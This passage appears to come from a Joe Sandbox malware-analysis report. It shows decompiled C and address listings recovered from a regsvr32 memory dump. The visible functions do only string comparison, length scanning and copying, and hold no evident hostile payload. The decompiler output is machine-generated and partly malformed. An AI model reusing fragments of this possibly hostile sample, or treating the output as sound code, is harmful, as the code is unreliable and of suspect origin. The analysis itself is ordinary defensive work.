														__eflags = 0;
														_v32 = _t513;
														_v28 = _t344;
														while(1) {
															_t426 = _t426 + 1;
															_t469 = _v40 + _t426 * 2;
															_t345 =  *_t469 & 0x0000ffff;
															__eflags = ( *(_t590 + _t426 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t346 =  <=  ? _t345 + 0x20 : _t345;
															__eflags = ( <=  ? _t345 + 0x20 : _t345) - _v44;
															if(( <=  ? _t345 + 0x20 : _t345) == _v44) {
																break;
															}
															__eflags =  *(_t590 + _t426 * 2) & 0x0000ffff;
															if(( *(_t590 + _t426 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L52;
														}
														_t510 = _v32;
														_t555 = _v52;
														_t340 = _v28;
														goto L68;
													}
													_v24 = _t603;
													_t341 = _v28;
													L166:
													__eflags = _t421;
													if(__eflags == 0) {
														goto L82;
													}
													if(__eflags > 0) {
														goto L83;
													}
													_t563 = _v36;
													_t591 = _v24;
													goto L89;
												}
												_v32 = _t510;
												_t587 = _t555;
												_v28 = _t340;
												_t546 = _v24;
												while(1) {
													__eflags =  *(_t546 + _t421 * 2) & 0x0000ffff;
													if(( *(_t546 + _t421 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t421 = _t421 + 1;
													__eflags = _t421 - _t555;
													if(_t421 < _t555) {
														continue;
													}
													_v24 = _t546;
													_t510 = _v32;
													_t340 = _v28;
													goto L74;
												}
												_v24 = _t546;
												_t510 = _v32;
												_t341 = _v28;
												goto L166;
												L74:
												_v28 = _t340;
												_t418 =  ~( ~_t587 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t418;
												_t556 = _v24;
												while(1) {
													asm("movdqu xmm1, [edi+esi*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb eax, xmm1");
													__eflags = _t340;
													if(_t340 != 0) {
														break;
													}
													_t587 = _t587 + 8;
													__eflags = _t587 - _t418;
													if(_t587 < _t418) {
														continue;
													}
													_v24 = _t556;
													_t341 = _v28;
													__eflags = _t418 - 0x7fffffff;
													if(_t418 >= 0x7fffffff) {
														goto L82;
													}
													goto L78;
												}
												asm("bsf ebx, ebx");
												_v24 = _t556;
												_t421 = (_t340 >> 1) + _t587;
												_t341 = _v28;
												goto L166;
											}
										}
										goto L39;
									}
									_t395 =  *_t498 & 0x0000ffff;
									 *_t552 = _t395;
									__eflags = _t395;
									if(_t395 == 0) {
										goto L33;
									}
									_t396 = 0;
									__eflags = 0;
									while(1) {
										_t396 = _t396 + 1;
										_t488 =  *(_t498 + _t396 * 4 - 2) & 0x0000ffff;
										 *(_t552 + _t396 * 4 - 2) = _t488;
										__eflags = _t488;
										if(_t488 == 0) {
											goto L33;
										}
										_t489 =  *(_t498 + _t396 * 4) & 0x0000ffff;
										 *(_t552 + _t396 * 4) = _t489;
										__eflags = _t489;
										if(_t489 != 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
							}
							_t552 = _v64;
							goto L36;
						}
						_t398 = _t551 & 0x0000000f;
						__eflags = _t398;
						if(_t398 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t609 =  ~( ~_t398 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t609;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t492;
								if(_t492 != 0) {
									break;
								}
								_t398 = _t398 + 8;
								__eflags = _t398 - _t609;
								if(_t398 < _t609) {
									continue;
								}
								__eflags = _t609 - 0x7fffffff;
								if(_t609 >= 0x7fffffff) {
									L22:
									_t459 = 0x40;
									_t581 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t551 + _t609 * 2) & 0x0000ffff;
									if(( *(_t551 + _t609 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t609 = _t609 + 1;
									__eflags = _t609 - 0x7fffffff;
									if(_t609 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L62:
								__eflags = _t581 - 0xfffffffe;
								if(_t581 != 0xfffffffe) {
									_t459 = 0x40;
								} else {
									 *_t551 = 0;
									_t459 = _v60;
								}
								goto L23;
							}
							asm("bsf esi, edx");
							_t581 = (_t609 >> 1) + _t398;
							goto L62;
						}
						_t609 = 0;
						__eflags = _t398 & 0x00000001;
						if((_t398 & 0x00000001) != 0) {
							goto L20;
						}
						_t398 =  ~_t398 + 0x10 >> 1;
						__eflags = _t398;
						while(1) {
							_t492 =  *(_t551 + _t609 * 2) & 0x0000ffff;
							__eflags = _t492;
							if(_t492 == 0) {
								goto L62;
							}
							_t609 = _t609 + 1;
							__eflags = _t609 - _t398;
							if(_t609 < _t398) {
								continue;
							}
							goto L16;
						}
						goto L62;
					}
					_t319 =  &_v64;
					goto L37;
				}
				if(_t551 == 0) {
					L6:
					_push(2);
					_push(_t304);
					E004710B0();
					_t614 =  &(_t614[2]);
					goto L8;
				}
				_t492 =  *_t304 & 0x0000ffff;
				 *_t551 = _t492;
				if(_t492 == 0) {
					goto L6;
				}
				while(1) {
					_t492 = 1;
					_t490 = _t304[1] & 0x0000ffff;
					 *(_t551 + 2) = _t490;
					if(_t490 == 0) {
						goto L6;
					}
					_t491 = _t304[2] & 0x0000ffff;
					 *(_t551 + 4) = _t491;
					if(_t491 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x0047c59e
0x0047c5a2
0x0047c5a4
0x0047c5a8
0x0047c5b2
0x0047c5b4
0x0047c5b7
0x0047c5bd
0x0047c5f7
0x0047c5f9
0x0047c5fc
0x0047c600
0x0047c608
0x0047c60e
0x0047c619
0x0047c61b
0x0047d019
0x0047d01e
0x0047c69f
0x0047c6a4
0x0047c6a4
0x0047c6a7
0x0047c6aa
0x0047c6ad
0x0047c6af
0x0047c6c4
0x0047c6c7
0x0047c6c7
0x0047c6cd
0x0047c6d5
0x0047c6d5
0x0047c6d5
0x0047c6d6
0x0047c6e0
0x0047c6ea
0x0047c6ed
0x0047c6f3
0x0047c6f5
0x0047c6f8
0x0047c6fc
0x0047c6fe
0x0047c738
0x0047c73a
0x00000000
0x0047c700
0x0047c700
0x0047c702
0x0047c72b
0x0047c72b
0x0047c72d
0x0047c72e
0x0047c733
0x0047c73d
0x0047c740
0x0047c744
0x0047c748
0x0047c74c
0x0047c74e
0x0047c752
0x0047c758
0x0047c75d
0x0047c75d
0x0047c761
0x0047c76a
0x0047c76a
0x0047c76f
0x0047c774
0x0047c776
0x0047c77e
0x0047c780
0x0047c786
0x0047c78a
0x0047c7c9
0x0047c878
0x0047c878
0x0047c87b
0x0047c87d
0x0047c884
0x0047c884
0x0047c886
0x0047c88a
0x0047c894
0x0047c898
0x0047c8a8
0x0047c8a8
0x0047c78e
0x0047c7b7
0x0047c7b7
0x0047c7b9
0x0047c7ba
0x0047c7bf
0x00000000
0x0047c7bf
0x0047c790
0x0047c793
0x0047c798
0x00000000
0x00000000
0x0047c79a
0x0047c79c
0x0047c79c
0x0047c79d
0x0047c7a2
0x0047c7a9
0x00000000
0x00000000
0x0047c7ab
0x0047c7af
0x0047c7b5
0x00000000
0x00000000
0x00000000
0x0047c7b5
0x00000000
0x0047c79c
0x0047c763
0x0047c768
0x0047c7d1
0x0047c7d3
0x0047c7d5
0x0047c819
0x0047c819
0x0047c81e
0x0047c823
0x0047c825
0x0047c82d
0x0047c82f
0x0047c835
0x0047c837
0x0047c839
0x0047c873
0x0047c875
0x00000000
0x0047c875
0x0047c83b
0x0047c83d
0x0047c866
0x0047c866
0x0047c868
0x0047c869
0x0047c86e
0x00000000
0x0047c86e
0x0047c83f
0x0047c842
0x0047c845
0x0047c847
0x00000000
0x00000000
0x0047c849
0x0047c849
0x0047c84b
0x0047c84b
0x0047c84c
0x0047c851
0x0047c856
0x0047c858
0x00000000
0x00000000
0x0047c85a
0x0047c85e
0x0047c862
0x0047c864
0x00000000
0x00000000
0x00000000
0x0047c864
0x00000000
0x0047c84b
0x0047c7da
0x0047c7dc
0x00000000
0x00000000
0x0047c7de
0x0047c7e5
0x0047c7eb
0x0047c7ee
0x0047c7ee
0x0047c7f0
0x0047c7f3
0x0047c7f7
0x0047c7f7
0x0047c7fb
0x0047c7fe
0x0047c801
0x0047c804
0x0047c807
0x0047c80a
0x00000000
0x00000000
0x0047c810
0x0047c815
0x0047c817
0x00000000
0x00000000
0x00000000
0x0047c817
0x0047c8c8
0x0047c8cc
0x0047c8cf
0x0047c8d1
0x00000000
0x00000000
0x0047c8d9
0x0047c8dc
0x0047c8e6
0x0047c8ec
0x0047c8ee
0x0047c8f2
0x0047c8f6
0x0047c8fa
0x0047c90a
0x0047c90a
0x0047c90a
0x0047c90c
0x0047c90e
0x00000000
0x00000000
0x0047c910
0x0047c912
0x0047c914
0x0047c98b
0x0047c98b
0x0047c98f
0x0047c993
0x0047c997
0x0047c999
0x00000000
0x00000000
0x0047c99f
0x0047c9a0
0x0047c9a6
0x00000000
0x00000000
0x0047c9a8
0x0047c9ac
0x0047c9b0
0x0047c9b0
0x0047c9b5
0x0047c9b5
0x0047c9b8
0x0047c9b8
0x0047c9ba
0x0047c9be
0x0047c9c2
0x0047c9c2
0x0047c9ca
0x0047c9cd
0x0047c9d1
0x0047c9d4
0x0047c9d7
0x0047c9da
0x0047c9e0
0x0047c9e6
0x0047c9e9
0x0047c9ec
0x00000000
0x00000000
0x0047c9f8
0x0047c9fa
0x0047ca02
0x0047ca02
0x0047ca06
0x0047ca0a
0x0047ca0e
0x0047ca12
0x0047ca12
0x0047ca14
0x00000000
0x00000000
0x0047ca1a
0x0047ca1e
0x0047ca22
0x0047ca26
0x0047ca26
0x0047ca28
0x0047ca28
0x0047ca2a
0x0047ca2c
0x0047ca2c
0x0047ca2f
0x00000000
0x00000000
0x0047ca39
0x0047ca3b
0x00000000
0x00000000
0x0047ca41
0x0047ca44
0x0047ca46
0x0047ca4a
0x0047ca4a
0x0047ca50
0x0047ca53
0x0047ca59
0x0047ca5c
0x0047ca67
0x0047ca6a
0x0047ca6d
0x00000000
0x00000000
0x0047ca77
0x0047ca79
0x00000000
0x00000000
0x0047ca7b
0x0047ca7b
0x0047ca7f
0x0047ca83
0x0047ca87
0x0047ca8b
0x0047ca8b
0x0047ca8d
0x0047caa8
0x0047cab4
0x0047cab4
0x0047caba
0x0047caba
0x0047cabf
0x0047cac3
0x0047cac7
0x0047cac9
0x00000000
0x00000000
0x0047cacf
0x0047cad2
0x0047cad4
0x00000000
0x00000000
0x0047cad6
0x0047cadc
0x0047caef
0x0047caef
0x0047caf4
0x0047caf6
0x0047caf6
0x0047caf9
0x0047cb15
0x0047cb21
0x0047cb21
0x0047cb27
0x0047cb27
0x0047cb2c
0x0047cb30
0x0047cb34
0x0047cb36
0x00000000
0x00000000
0x0047cb3c
0x0047cb3f
0x0047cb41
0x00000000
0x00000000
0x0047cb43
0x0047cb49
0x0047cb5c
0x0047cb5c
0x0047cb61
0x0047cb66
0x0047cb6e
0x0047cb70
0x0047cb72
0x0047cb74
0x0047cb77
0x0047cb79
0x0047cb7c
0x0047cb7f
0x0047cb81
0x0047cb84
0x0047cb86
0x0047ccdc
0x0047ccdc
0x0047cce6
0x0047cce8
0x0047ccee
0x0047ccf0
0x0047ccf2
0x0047cd31
0x00000000
0x0047cd31
0x0047ccf4
0x0047ccf6
0x0047cd1f
0x0047cd1f
0x0047cd21
0x0047cd22
0x0047cd27
0x00000000
0x0047cd27
0x0047ccf8
0x0047ccfb
0x0047ccfe
0x0047cd00
0x00000000
0x00000000
0x0047cd02
0x0047cd02
0x0047cd04
0x0047cd04
0x0047cd05
0x0047cd0a
0x0047cd0f
0x0047cd11
0x00000000
0x00000000
0x0047cd13
0x0047cd17
0x0047cd1b
0x0047cd1d
0x00000000
0x00000000
0x00000000
0x0047cd1d
0x00000000
0x0047cd04
0x0047cb8c
0x0047cb8f
0x0047cb91
0x00000000
0x00000000
0x0047cb97
0x0047cb99
0x0047cc09
0x0047cc0e
0x0047cc0e
0x0047cc11
0x0047cc14
0x0047cc17
0x0047cc19
0x0047cc2c
0x0047cc2f
0x0047cc2f
0x0047cc35
0x0047cc3d
0x0047cc3d
0x0047cc3d
0x0047cc3e
0x0047cc48
0x0047cc52
0x0047cc55
0x0047cc5b
0x0047cc5d
0x0047cc63
0x0047cc65
0x0047cc67
0x0047cca1
0x0047cca3
0x00000000
0x0047cc69
0x0047cc69
0x0047cc6b
0x0047cc94
0x0047cc94
0x0047cc96
0x0047cc97
0x0047cc9c
0x0047cca6
0x0047cca6
0x0047ccac
0x0047ccaf
0x0047ccb1
0x0047ccb1
0x0047ccb3
0x00000000
0x00000000
0x0047ccb9
0x0047ccc3
0x0047ccc3
0x0047ccc6
0x0047ccc7
0x0047ccca
0x0047cccc
0x00000000
0x00000000
0x0047ccce
0x0047ccd0
0x0047cd3b
0x00000000
0x0047cd3b
0x0047ccd2
0x0047ccd2
0x0047ccd4
0x00000000
0x00000000
0x0047ccbd
0x0047ccc0
0x0047ccc0
0x0047ccc0
0x0047ccc3
0x0047cc6d
0x0047cc70
0x0047cc73
0x0047cc75
0x00000000
0x00000000
0x0047cc77
0x0047cc77
0x0047cc79
0x0047cc79
0x0047cc7a
0x0047cc7f
0x0047cc84
0x0047cc86
0x00000000
0x00000000
0x0047cc88
0x0047cc8c
0x0047cc90
0x0047cc92
0x00000000
0x00000000
0x00000000
0x0047cc92
0x00000000
0x0047cc79
0x0047cc67
0x0047cc1b
0x00000000
0x0047cc1b
0x0047cb9d
0x0047cb9d
0x0047cba0
0x0047cbbd
0x0047cbc9
0x0047cbc9
0x0047cbcf
0x0047cbcf
0x0047cbd4
0x0047cbd8
0x0047cbdc
0x0047cbde
0x00000000
0x00000000
0x0047cbe4
0x0047cbe7
0x0047cbe9
0x00000000
0x00000000
0x0047cbeb
0x0047cbf1
0x0047cc04
0x0047cc04
0x00000000
0x00000000
0x00000000
0x00000000
0x0047cbf3
0x0047cbf3
0x0047cbf7
0x0047cbf9
0x00000000
0x00000000
0x0047cbfb
0x0047cbfc
0x0047cc02
0x00000000
0x00000000
0x00000000
0x0047cc02
0x00000000
0x0047cbf3
0x0047cd6b
0x0047cd70
0x00000000
0x0047cd70
0x0047cba2
0x0047cba4
0x0047cba7
0x00000000
0x00000000
0x0047cbae
0x0047cbae
0x0047cbb0
0x0047cbb0
0x0047cbb4
0x0047cbb6
0x00000000
0x00000000
0x0047cbb8
0x0047cbb9
0x0047cbbb
0x00000000
0x00000000
0x00000000
0x0047cbbb
0x00000000
0x00000000
0x00000000
0x00000000
0x0047cb4b
0x0047cb4b
0x0047cb4f
0x0047cb51
0x00000000
0x00000000
0x0047cb53
0x0047cb54
0x0047cb5a
0x00000000
0x00000000
0x00000000
0x0047cb5a
0x00000000
0x0047cb4b
0x0047cd77
0x0047cd7c
0x00000000
0x0047cd7c
0x0047cafb
0x0047cafd
0x0047caff
0x00000000
0x00000000
0x0047cb06
0x0047cb06
0x0047cb08
0x0047cb08
0x0047cb0c
0x0047cb0e
0x00000000
0x00000000
0x0047cb10
0x0047cb11
0x0047cb13
0x00000000
0x00000000
0x00000000
0x0047cb13
0x00000000
0x00000000
0x00000000
0x00000000
0x0047cade
0x0047cade
0x0047cae2
0x0047cae4
0x00000000
0x00000000
0x0047cae6
0x0047cae7
0x0047caed
0x00000000
0x00000000
0x00000000
0x0047caed
0x00000000
0x0047cade
0x0047cd83
0x0047cd88
0x00000000
0x0047cd88
0x0047ca8f
0x0047ca91
0x0047ca93
0x00000000
0x00000000
0x0047ca95
0x0047ca99
0x0047ca9b
0x0047ca9b
0x0047ca9f
0x0047caa1
0x00000000
0x00000000
0x0047caa3
0x0047caa4
0x0047caa6
0x00000000
0x00000000
0x00000000
0x0047caa6
0x00000000
0x0047ca9b
0x0047cd8f
0x0047cd93
0x0047cd97
0x0047cd9b
0x0047cdad
0x0047cdad
0x0047cdaf
0x0047cdb1
0x00000000
0x00000000
0x0047cdb3
0x0047cdb3
0x0047cdb5
0x0047cdb7
0x0047ce2e
0x0047ce2e
0x0047ce32
0x0047ce36
0x0047ce3a
0x0047ce3c
0x00000000
0x00000000
0x0047ce42
0x0047ce43
0x0047ce49
0x00000000
0x00000000
0x0047ce4b
0x0047ce4f
0x0047ce53
0x0047ce53
0x0047ce58
0x0047ce58
0x0047ce5c
0x0047ce5c
0x0047ce5e
0x0047ce62
0x0047ce66
0x0047ce66
0x0047ce6e
0x0047ce71
0x0047ce75
0x0047ce78
0x0047ce7b
0x0047ce7e
0x0047ce84
0x0047ce8a
0x0047ce8d
0x0047ce90
0x00000000
0x00000000
0x0047ce94
0x0047ce96
0x0047cea2
0x0047cea2
0x0047cea5
0x0047cea5
0x0047cea7
0x0047ceab
0x0047ceab
0x0047cead
0x00000000
0x00000000
0x00000000
0x0047cead
0x0047ce98
0x0047ce99
0x0047ce9d
0x00000000
0x00000000
0x00000000
0x0047ce9d
0x0047ceec
0x0047cef4
0x0047cefa
0x0047cefa
0x0047cefd
0x0047cf4b
0x0047cf4b
0x0047cf4f
0x00000000
0x0047cf4f
0x0047cf03
0x0047cf05
0x00000000
0x00000000
0x0047cf07
0x0047cf0b
0x0047cf0b
0x0047cf0d
0x0047cf11
0x0047cf15
0x0047cf15
0x0047cf1f
0x0047cf22
0x0047cf28
0x0047cf32
0x0047cf35
0x0047cf38
0x00000000
0x00000000
0x0047cf42
0x0047cf44
0x00000000
0x00000000
0x00000000
0x0047cf46
0x0047cda1
0x0047cda5
0x0047cda9
0x0047cdad
0x0047cdaf
0x0047cdb1
0x00000000
0x00000000
0x00000000
0x0047cdb1
0x0047cf58
0x0047cf5c
0x0047ced3
0x0047ced3
0x0047ced5
0x00000000
0x00000000
0x0047cedb
0x00000000
0x00000000
0x0047cee1
0x0047cee5
0x0047cee7
0x00000000
0x0047cee7
0x0047cdb9
0x0047cdbd
0x0047cdbf
0x0047cdc3
0x0047cdc7
0x0047cdcb
0x0047cdcd
0x00000000
0x00000000
0x0047cdd3
0x0047cdd4
0x0047cdd6
0x00000000
0x00000000
0x0047cdd8
0x0047cddc
0x0047cde0
0x00000000
0x0047cde0
0x0047cec7
0x0047cecb
0x0047cecf
0x00000000
0x0047cde4
0x0047cdf0
0x0047cdf4
0x0047cdf4
0x0047cdfa
0x0047cdfe
0x0047cdfe
0x0047ce03
0x0047ce07
0x0047ce0b
0x0047ce0d
0x00000000
0x00000000
0x0047ce13
0x0047ce16
0x0047ce18
0x00000000
0x00000000
0x0047ce1a
0x0047ce22
0x0047ce26
0x0047ce2c
0x00000000
0x00000000
0x00000000
0x0047ce2c
0x0047cf67
0x0047cf6c
0x0047cf70
0x0047cf76
0x00000000
0x0047cf76
0x0047cdad
0x0047ceb3
0x0047ceb3
0x0047ceb6
0x0047ceba
0x0047cebe
0x00000000
0x0047cebe
0x0047c9fc
0x0047c9fd
0x0047ca00
0x00000000
0x00000000
0x00000000
0x0047ca00
0x0047cf7f
0x0047cf87
0x0047cf8d
0x0047cf8d
0x0047cf90
0x00000000
0x00000000
0x0047cf9a
0x0047cf9c
0x00000000
0x00000000
0x0047cfa2
0x0047cfa6
0x0047cfa6
0x0047cfa8
0x0047cfac
0x0047cfb0
0x0047cfb0
0x0047cfba
0x0047cfbd
0x0047cfc3
0x0047cfcd
0x0047cfd0
0x0047cfd3
0x00000000
0x00000000
0x0047cfdd
0x0047cfdf
0x00000000
0x00000000
0x00000000
0x0047cfe1
0x0047c8fe
0x0047c902
0x0047c906
0x00000000
0x0047c906
0x0047cfe6
0x0047cfea
0x0047cd50
0x0047cd50
0x0047cd52
0x00000000
0x00000000
0x0047cd58
0x00000000
0x00000000
0x0047cd5e
0x0047cd62
0x00000000
0x0047cd62
0x0047c916
0x0047c91a
0x0047c91c
0x0047c920
0x0047c924
0x0047c928
0x0047c92a
0x00000000
0x00000000
0x0047c930
0x0047c931
0x0047c933
0x00000000
0x00000000
0x0047c935
0x0047c939
0x0047c93d
0x00000000
0x0047c93d
0x0047cd44
0x0047cd48
0x0047cd4c
0x00000000
0x0047c941
0x0047c94d
0x0047c951
0x0047c951
0x0047c957
0x0047c95b
0x0047c95b
0x0047c960
0x0047c964
0x0047c968
0x0047c96a
0x00000000
0x00000000
0x0047c970
0x0047c973
0x0047c975
0x00000000
0x00000000
0x0047c977
0x0047c97f
0x0047c983
0x0047c989
0x00000000
0x00000000
0x00000000
0x0047c989
0x0047cff5
0x0047cffa
0x0047cffe
0x0047d004
0x00000000
0x0047d004
0x0047c90a
0x00000000
0x0047c768
0x0047c704
0x0047c707
0x0047c70a
0x0047c70c
0x00000000
0x00000000
0x0047c70e
0x0047c70e
0x0047c710
0x0047c710
0x0047c711
0x0047c716
0x0047c71b
0x0047c71d
0x00000000
0x00000000
0x0047c71f
0x0047c723
0x0047c727
0x0047c729
0x00000000
0x00000000
0x00000000
0x0047c729
0x00000000
0x0047c710
0x0047c6fe
0x0047c6b1
0x00000000
0x0047c6b1
0x0047c623
0x0047c623
0x0047c626
0x0047c646
0x0047c64a
0x0047c656
0x0047c656
0x0047c65c
0x0047c65c
0x0047c661
0x0047c665
0x0047c669
0x0047c66b
0x00000000
0x00000000
0x0047c671
0x0047c674
0x0047c676
0x00000000
0x00000000
0x0047c678
0x0047c67e
0x0047c695
0x0047c695
0x0047c69a
0x00000000
0x00000000
0x00000000
0x00000000
0x0047c680
0x0047c680
0x0047c684
0x0047c686
0x00000000
0x00000000
0x0047c68c
0x0047c68d
0x0047c693
0x00000000
0x00000000
0x00000000
0x0047c693
0x0047c8ab
0x0047c8ab
0x0047c8ae
0x0047c8be
0x0047c8b0
0x0047c8b2
0x0047c8b5
0x0047c8b5
0x00000000
0x0047c8ae
0x0047d00d
0x0047d012
0x00000000
0x0047d012
0x0047c628
0x0047c62a
0x0047c62c
0x00000000
0x00000000
0x0047c633
0x0047c633
0x0047c635
0x0047c635
0x0047c639
0x0047c63b
0x00000000
0x00000000
0x0047c641
0x0047c642
0x0047c644
0x00000000
0x00000000
0x00000000
0x0047c644
0x00000000
0x0047c635
0x0047c610
0x00000000
0x0047c610
0x0047c5c1
0x0047c5ea
0x0047c5ea
0x0047c5ec
0x0047c5ed
0x0047c5f2
0x00000000
0x0047c5f2
0x0047c5c3
0x0047c5c6
0x0047c5cb
0x00000000
0x00000000
0x0047c5cf
0x0047c5cf
0x0047c5d0
0x0047c5d5
0x0047c5dc
0x00000000
0x00000000
0x0047c5de
0x0047c5e2
0x0047c5e8
0x00000000
0x00000000
0x00000000
0x0047c5e8
0x00000000

Strings

@, xrefs: 0047C600

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction ID: afced3143da702c76e17df11b31a583def54f1c83ee8d76065ff5516bcce3dfd
Opcode Fuzzy Hash: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction Fuzzy Hash: 1F62B6756047128BC7248F29C4C05ABB3E2BFD8754B19C62EE89D97394E738DD41C78A

Uniqueness

Uniqueness Score: -1.00%

Function 00482E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00482E60(signed int __ecx, void* __eflags, signed int _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t230;
				signed int _t231;
				signed int* _t237;
				char* _t238;
				void* _t245;
				signed int _t246;
				char _t249;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				void* _t257;
				void* _t258;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t268;
				char _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				void* _t286;
				void* _t288;
				signed int _t292;
				void* _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				char _t312;
				char _t313;
				char _t314;
				char _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				void* _t330;
				signed int _t331;
				signed int _t332;
				signed int _t335;
				signed int _t336;
				void* _t337;
				signed int _t340;
				void* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				char* _t347;
				signed int _t350;
				signed int _t352;
				void* _t355;
				signed int _t357;
				char _t359;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t379;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t386;
				void* _t389;
				signed int _t390;
				char _t392;
				signed int _t395;
				signed int _t400;
				char _t402;
				char _t403;
				char _t404;
				signed int _t406;
				unsigned int _t411;
				signed int _t413;
				signed int _t415;
				signed int _t416;
				signed int _t421;
				signed int _t422;
				signed int _t433;
				signed int _t434;
				signed int _t435;
				signed int _t441;
				signed int _t443;
				signed int _t449;
				signed int _t450;
				signed int _t452;
				signed int _t461;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t478;
				signed int _t482;
				void* _t485;

				_v56 = 0;
				_t449 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t406 = E00471030();
				_t485 = (_t482 & 0xfffffff0) - 0x34 + 4;
				_t230 = _v56;
				if(_t230 == 0) {
					 *_t406 = 0;
					L8:
					_t231 = _a8;
					_v52 = 0x40;
					_v56 = _t406;
					if(_t231 != 0) {
						__eflags = _t406;
						if(_t406 == 0) {
							_t310 = 0x40;
							_t283 = 0;
							L22:
							_t20 = _t283 + 2; // 0x80000001
							_t341 = _t20;
							__eflags = _t341 - 0x40;
							_t342 =  <=  ? 0x40 : _t341;
							__eflags = _t310 - _t342;
							if(_t310 < _t342) {
								_t411 = (_t342 >> 5 >> 0x1a) + _t342 >> 6;
								_t343 = _t342 & 0x8000003f;
								__eflags = _t343;
								if(_t343 < 0) {
									_t343 = (_t343 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t343;
								}
								__eflags = _t343;
								_t413 = _t411 + (0 | _t343 > 0x00000000) << 6;
								_push(_t413);
								_t311 = E00471030();
								_t485 = _t485 + 4;
								_t344 = _v56;
								__eflags = _t344;
								if(_t344 == 0) {
									 *_t311 = 0;
									goto L35;
								} else {
									__eflags = _t311;
									if(_t311 == 0) {
										L33:
										_push(1);
										_push(_t344);
										_v68 = _t311;
										E004710B0();
										_t311 = _v68;
										_t485 = _t485 + 8;
										L35:
										_v52 = _t413;
										_v56 = _t311;
										L36:
										 *((char*)(_t311 + _t283)) = _a8;
										_t237 =  &_v56;
										 *((char*)(_t283 +  *_t237 + 1)) = 0;
										L37:
										_t238 =  *_t237;
										_v28 = _t238;
										_t284 = _a4;
										if(_t238 == 0) {
											L39:
											_push(0x40);
											 *_t284 = 0;
											 *(_t284 + 4) = 0;
											_t450 = E00471030();
											_t485 = _t485 + 4;
											_t347 =  *_t284;
											if(_t347 == 0) {
												 *_t450 = 0;
												L61:
												 *_t284 = _t450;
												 *(_t284 + 4) = 0x40;
												L62:
												_push(1);
												_push(_v56);
												E004710B0();
												_v56 = 0;
												_v52 = 0;
												return _t284;
											}
											if(_t450 == 0) {
												L45:
												_push(1);
												_push(_t347);
												E004710B0();
												_t485 = _t485 + 8;
												goto L61;
											}
											_t312 =  *_t347;
											 *_t450 = _t312;
											if(_t312 == 0) {
												goto L45;
											}
											_t415 = 0;
											while(1) {
												_t415 = _t415 + 1;
												_t313 =  *((char*)(_t347 + _t415 * 2 - 1));
												 *((char*)(_t450 + _t415 * 2 - 1)) = _t313;
												if(_t313 == 0) {
													goto L45;
												}
												_t314 =  *((char*)(_t347 + _t415 * 2));
												 *((char*)(_t450 + _t415 * 2)) = _t314;
												if(_t314 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t315 =  *_t238;
										_v48 = _t315;
										if(_t315 != 0) {
											_t350 =  *_t449;
											_v60 = _t350;
											__eflags = _t350;
											if(_t350 == 0) {
												L53:
												_push(0x40);
												 *_t284 = 0;
												 *(_t284 + 4) = 0;
												_t450 = E00471030();
												_t485 = _t485 + 4;
												_t352 =  *_t284;
												__eflags = _t352;
												if(_t352 == 0) {
													 *_t450 = 0;
													goto L61;
												}
												__eflags = _t450;
												if(_t450 == 0) {
													L59:
													_push(1);
													_push(_t352);
													E004710B0();
													_t485 = _t485 + 8;
													goto L61;
												}
												_t316 =  *_t352;
												 *_t450 = _t316;
												__eflags = _t316;
												if(_t316 == 0) {
													goto L59;
												}
												_t416 = 0;
												__eflags = 0;
												while(1) {
													_t416 = _t416 + 1;
													_t317 =  *((char*)(_t352 + _t416 * 2 - 1));
													 *(_t450 + _t416 * 2 - 1) = _t317;
													__eflags = _t317;
													if(_t317 == 0) {
														goto L59;
													}
													_t318 =  *((char*)(_t352 + _t416 * 2));
													 *(_t450 + _t416 * 2) = _t318;
													__eflags = _t318;
													if(_t318 != 0) {
														continue;
													}
													goto L59;
												}
												goto L59;
											}
											__eflags =  *_t350;
											if( *_t350 == 0) {
												goto L53;
											}
											_t417 = _t315;
											_t319 = _t350;
											_t63 = _t417 - 0x41; // -65
											_t452 = _t63;
											_v64 = _t452;
											__eflags = _t452 - 0x19;
